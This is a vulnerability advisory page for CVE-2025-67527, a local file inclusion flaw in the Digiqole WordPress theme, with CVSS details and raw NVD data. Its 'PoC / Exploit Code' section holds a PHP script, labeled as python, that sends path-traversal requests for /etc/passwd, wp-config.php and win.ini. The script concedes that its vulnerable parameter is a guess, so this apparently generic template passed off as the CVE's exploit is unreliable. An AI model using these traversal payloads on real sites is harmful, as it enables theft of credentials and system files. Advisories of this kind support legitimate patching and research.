Security Vulnerability Report
中文
CVE-2025-67527 CVSS 7.5 HIGH

CVE-2025-67527

Published: 2025-12-09 16:18:27
Last Modified: 2026-04-27 18:16:41

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in trippleS Digiqole digiqole allows PHP Local File Inclusion.This issue affects Digiqole: from n/a through < 2.2.7.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Digiqole Theme < 2.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-67527 PoC - Digiqole Theme Local File Inclusion * Target: WordPress Digiqole Theme < 2.2.7 * Type: LFI (Local File Inclusion) * * Usage: Modify target URL and file path, then execute */ // Target configuration $target = 'http://target-site.com'; $endpoint = '/wp-content/themes/digiqole/'; // Vulnerable parameter (need to identify via source code analysis) $vulnerable_param = 'file'; // Files to test for LFI $test_files = [ '../../../../../../../../etc/passwd', '../../../../../../../../wp-config.php', '../../../../../../../../windows/win.ini' ]; foreach ($test_files as $file) { $url = $target . $endpoint . '?' . $vulnerable_param . '=' . urlencode($file); echo "Testing: $url\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); // Check for successful file inclusion if ($http_code == 200 && strlen($response) > 100) { echo "[+] LFI Confirmed! File content retrieved\n"; break; } } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67527", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:27.280", "lastModified": "2026-04-27T18:16:41.437", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in trippleS Digiqole digiqole allows PHP Local File Inclusion.This issue affects Digiqole: from n/a through < 2.2.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/digiqole/vulnerability/wordpress-digiqole-theme-2-2-7-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}